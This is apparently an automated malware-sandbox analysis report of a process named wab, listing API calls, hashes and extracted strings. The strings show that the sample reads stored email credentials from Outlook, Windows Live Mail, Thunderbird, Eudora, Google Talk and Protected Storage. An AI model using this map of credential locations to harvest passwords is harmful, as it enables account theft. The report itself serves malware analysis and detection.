                  • API String ID: 2773794195-880857682
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$memset
                  • String ID:
                  • API String ID: 438689982-0
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@$memset
                  • String ID:
                  • API String ID: 1860491036-0
                  APIs
                  • memcmp.MSVCRT ref: 00408AF3
                    • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                    • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                    • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                  • memcmp.MSVCRT ref: 00408B2B
                  • memcmp.MSVCRT ref: 00408B5C
                  • memcpy.MSVCRT ref: 00408B79
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcmp$memcpy
                  • String ID:
                  • API String ID: 231171946-0
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: wcslen$wcscat$wcscpy
                  • String ID:
                  • API String ID: 1961120804-0

                  Execution Graph

                  Execution Coverage:2.4%
                  Dynamic/Decrypted Code Coverage:20.4%
                  Signature Coverage:0.5%
                  Total number of Nodes:848
                  Total number of Limit Nodes:17
SetDlgItemTextA GetDlgItemTextA 34401 44b301 ??3@YAXPAX 34404 4120ea 14 API calls 3 library calls 34405 40bb0a 8 API calls 34407 413f11 strcmp 34211 434110 17 API calls __fprintf_l 34214 425115 108 API calls __fprintf_l 34408 444b11 _onexit 34216 425115 76 API calls __fprintf_l 34219 429d19 10 API calls 34411 444b1f __dllonexit 34412 409f20 _strcmpi 34221 42b927 31 API calls 34415 433f26 19 API calls __fprintf_l 34416 44b323 FreeLibrary 34417 427f25 46 API calls 34418 43ff2b 17 API calls 34419 43fb30 19 API calls 34228 414d36 16 API calls 34230 40ad38 7 API calls 34421 433b38 16 API calls __fprintf_l 34422 44b33b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 34234 426741 21 API calls 34235 40c5c3 125 API calls 34237 43fdc5 17 API calls 34423 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34240 4161cb memcpy memcpy memcpy memcpy 33203 44b3cf 33204 44b3e6 33203->33204 33206 44b454 33203->33206 33204->33206 33210 44b40e 33204->33210 33207 44b405 33207->33206 33208 44b435 VirtualProtect 33207->33208 33208->33206 33209 44b444 VirtualProtect 33208->33209 33209->33206 33211 44b413 33210->33211 33214 44b454 33211->33214 33217 44b42b 33211->33217 33213 44b41c 33213->33214 33215 44b435 VirtualProtect 33213->33215 33215->33214 33216 44b444 VirtualProtect 33215->33216 33216->33214 33218 44b431 33217->33218 33219 44b435 VirtualProtect 33218->33219 33221 44b454 33218->33221 33220 44b444 VirtualProtect 33219->33220 33219->33221 33220->33221 34428 43ffc8 18 API calls 34241 4281cc 15 API calls __fprintf_l 34430 4383cc 110 API calls __fprintf_l 34242 4275d3 41 API calls 34431 4153d3 22 API calls __fprintf_l 34243 444dd7 _XcptFilter 34436 4013de 15 API calls 34438 425115 111 API calls __fprintf_l 34439 43f7db 18 API calls 34442 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34245 4335ee 16 API calls __fprintf_l 34444 429fef 11 API calls 34246 444deb _exit _c_exit 34445 40bbf0 138 API calls 34249 425115 79 API calls __fprintf_l 34449 437ffa 22 API calls 34253 
4021ff 14 API calls 34254 43f5fc 149 API calls 34450 40e381 9 API calls 34256 405983 40 API calls 34257 42b186 27 API calls __fprintf_l 34258 427d86 76 API calls 34259 403585 20 API calls 34261 42e58e 18 API calls __fprintf_l 34264 425115 75 API calls __fprintf_l 34266 401592 8 API calls 33189 410b92 33192 410a6b 33189->33192 33191 410bb2 33193 410a77 33192->33193 33194 410a89 GetPrivateProfileIntA 33192->33194 33197 410983 memset _itoa WritePrivateProfileStringA 33193->33197 33194->33191 33196 410a84 33196->33191 33197->33196 34454 434395 16 API calls 34268 441d9c memcmp 34456 43f79b 119 API calls 34269 40c599 43 API calls 34457 426741 87 API calls 34273 4401a6 21 API calls 34275 426da6 memcpy memset memset memcpy 34276 4335a5 15 API calls 34278 4299ab memset memset memcpy memset memset 34279 40b1ab 8 API calls 34462 425115 76 API calls __fprintf_l 34466 4113b2 18 API calls 2 library calls 34470 40a3b8 memset sprintf SendMessageA 33222 410bbc 33225 4109cf 33222->33225 33226 4109dc 33225->33226 33227 410a23 memset GetPrivateProfileStringA 33226->33227 33228 4109ea memset 33226->33228 33233 407646 strlen 33227->33233 33238 4075cd sprintf memcpy 33228->33238 33231 410a0c WritePrivateProfileStringA 33232 410a65 33231->33232 33234 40765a 33233->33234 33235 40765c 33233->33235 33234->33232 33236 4076a3 33235->33236 33239 40737c strtoul 33235->33239 33236->33232 33238->33231 33239->33235 34281 40b5bf memset memset _mbsicmp

                  Control-flow Graph: entry block 4082cd-40841a (rendered graph not reproduced; node and edge listing omitted)
                  APIs
                  • memset.MSVCRT ref: 0040832F
                  • memset.MSVCRT ref: 00408343
                  • memset.MSVCRT ref: 0040835F
                  • memset.MSVCRT ref: 00408376
                  • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                  • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                  • strlen.MSVCRT ref: 004083E9
                  • strlen.MSVCRT ref: 004083F8
                  • memcpy.MSVCRT ref: 0040840A
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                  • String ID: 5$H$O$b$i$}$}
                  • API String ID: 1832431107-3760989150
                  • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                  • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                  • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                  • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65

                  Control-flow Graph: entry block 407ef8-407f01 (rendered graph not reproduced; node and edge listing omitted)
                  APIs
                  • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                  • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                  • strlen.MSVCRT ref: 00407F5C
                  • strlen.MSVCRT ref: 00407F64
                  Similarity
                  • API ID: FileFindstrlen$FirstNext
                  • String ID: ACD
                  • API String ID: 379999529-620537770
                  • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                  • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                  • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                  • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                  Control-flow Graph

                  APIs
                  • memset.MSVCRT ref: 00401E8B
                  • strlen.MSVCRT ref: 00401EA4
                  • strlen.MSVCRT ref: 00401EB2
                  • strlen.MSVCRT ref: 00401EF8
                  • strlen.MSVCRT ref: 00401F06
                  • memset.MSVCRT ref: 00401FB1
                  • atoi.MSVCRT ref: 00401FE0
                  • memset.MSVCRT ref: 00402003
                  • sprintf.MSVCRT ref: 00402030
                    • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                  • memset.MSVCRT ref: 00402086
                  • memset.MSVCRT ref: 0040209B
                  • strlen.MSVCRT ref: 004020A1
                  • strlen.MSVCRT ref: 004020AF
                  • strlen.MSVCRT ref: 004020E2
                  • strlen.MSVCRT ref: 004020F0
                  • memset.MSVCRT ref: 00402018
                    • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                    • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                  • _mbscpy.MSVCRT ref: 00402177
                  • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                  • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                    • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                  Similarity
                  • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                  • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                  • API String ID: 1846531875-4223776976
                  • Opcode ID: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                  • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                  • Opcode Fuzzy Hash: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                  • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                    • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                    • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                    • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040D190
                  • DeleteObject.GDI32(?), ref: 0040D1A6
                  Similarity
                  • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                  • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                  • API String ID: 745651260-375988210
                  • Opcode ID: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                  • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                  • Opcode Fuzzy Hash: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                  • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                  Control-flow Graph

                  APIs
                    • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                  • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                  • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                  • _mbscpy.MSVCRT ref: 00403E54
                  Strings
                  • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                  • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                  • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                  • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                  • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                  • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                  • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                  • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                  • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                  • PStoreCreateInstance, xrefs: 00403C44
                  • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                  • pstorec.dll, xrefs: 00403C30
                  Similarity
                  • API ID: Library$AddressFreeLoadProc_mbscpy
                  • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                  • API String ID: 1197458902-317895162
                  • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                  • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                  • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                  • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                  Control-flow Graph: entry block 444c4a-444c66 (rendered graph not reproduced; node and edge listing omitted)
                  Similarity
                  • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                  • String ID: k:v
                  • API String ID: 3662548030-4078055367
                  • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                  • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                  • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                  • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D

                  Control-flow Graph: entry block 40fb00-40fb35 (rendered graph not reproduced; node and edge listing omitted)
                  APIs
                  • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                  • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                  • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                    • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                  • memcpy.MSVCRT ref: 0040FBE4
                  • memcpy.MSVCRT ref: 0040FBF9
                    • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                    • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                    • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                    • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                  • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                  • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                  Similarity
                  • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                  • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                  • API String ID: 2768085393-2409096184
                  • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                  • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                  • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                  • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A

                  Control-flow Graph

                  APIs
                  • memset.MSVCRT ref: 0044430B
                    • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                    • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                    • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                    • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                    • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                    • Part of subcall function 00410DBB: _mbscpy.MSVCRT ref: 00410E87
                  • memset.MSVCRT ref: 00444379
                  • memset.MSVCRT ref: 00444394
                    • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                  • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                  • strlen.MSVCRT ref: 004443DB
                  • _strcmpi.MSVCRT ref: 00444401
                  Strings
                  • \Microsoft\Windows Mail, xrefs: 00444329
                  • \Microsoft\Windows Live Mail, xrefs: 00444350
                  • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                  • Store Root, xrefs: 004443A5
                  Similarity
                  • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                  • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                  • API String ID: 832325562-2578778931
                  • Opcode ID: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                  • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                  • Opcode Fuzzy Hash: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                  • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                  Control-flow Graph: entry block 40f460-40f5bd (rendered graph not reproduced; node and edge listing omitted)
                  APIs
                  • memset.MSVCRT ref: 0040F567
                  • memset.MSVCRT ref: 0040F57F
                    • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                  • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                    • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                    • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                  • memcpy.MSVCRT ref: 0040F652
                  • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                  Similarity
                  • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                  • String ID:
                  • API String ID: 2012582556-3916222277
                  • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                  • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                  • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                  • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA

                  Control-flow Graph: entry block 4037ca-40381c (rendered graph not reproduced; node and edge listing omitted)
                  APIs
                  • memset.MSVCRT ref: 004037EB
                  • memset.MSVCRT ref: 004037FF
                    • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                    • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                    • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                    • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                  • strchr.MSVCRT ref: 0040386E
                  • _mbscpy.MSVCRT ref: 0040388B
                  • strlen.MSVCRT ref: 00403897
                  • sprintf.MSVCRT ref: 004038B7
                  • _mbscpy.MSVCRT ref: 004038CD
                  Similarity
                  • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                  • String ID: %s@yahoo.com
                  • API String ID: 317221925-3288273942
                  • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                  • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                  • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                  • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59

                  Control-flow Graph: entry block 4034e4-403544 (rendered graph not reproduced; node and edge listing omitted)
                  APIs
                  • memset.MSVCRT ref: 00403504
                  • memset.MSVCRT ref: 0040351A
                    • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                  • _mbscpy.MSVCRT ref: 00403555
                    • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                    • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                  • _mbscat.MSVCRT ref: 0040356D
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: _mbscatmemset$Close_mbscpystrlen
                  • String ID: InstallPath$Software\Group Mail$fb.dat
                  • API String ID: 3071782539-966475738
                  • Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                  • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                  • Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                  • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9

                  Control-flow Graph
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                  • String ID:
                  • API String ID: 2054149589-0
                  • Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                  • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                  • Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                  • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                  Control-flow Graph

                  APIs
                    • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                    • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                    • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                    • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                    • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                    • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                    • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                    • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                    • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                    • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                  • memset.MSVCRT ref: 00408620
                    • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                  • memset.MSVCRT ref: 00408671
                  • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                  • RegCloseKey.ADVAPI32(?), ref: 004086D6
                  Strings
                  • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                  • String ID: Software\Google\Google Talk\Accounts
                  • API String ID: 1366857005-1079885057
                  • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                  • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                  • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                  • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                  Control-flow Graph
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: Cursor_mbsicmpqsort
                  • String ID: /nosort$/sort
                  • API String ID: 882979914-1578091866
                  • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                  • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                  • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                  • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9

                  Control-flow Graph
                  APIs
                    • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                    • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                  • memset.MSVCRT ref: 00410E10
                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                  • _mbscpy.MSVCRT ref: 00410E87
                    • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                  Strings
                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                  • API String ID: 889583718-2036018995
                  • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                  • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                  • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                  • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                  APIs
                  • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                  • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                  • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                  • LockResource.KERNEL32(00000000), ref: 00410CA1
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
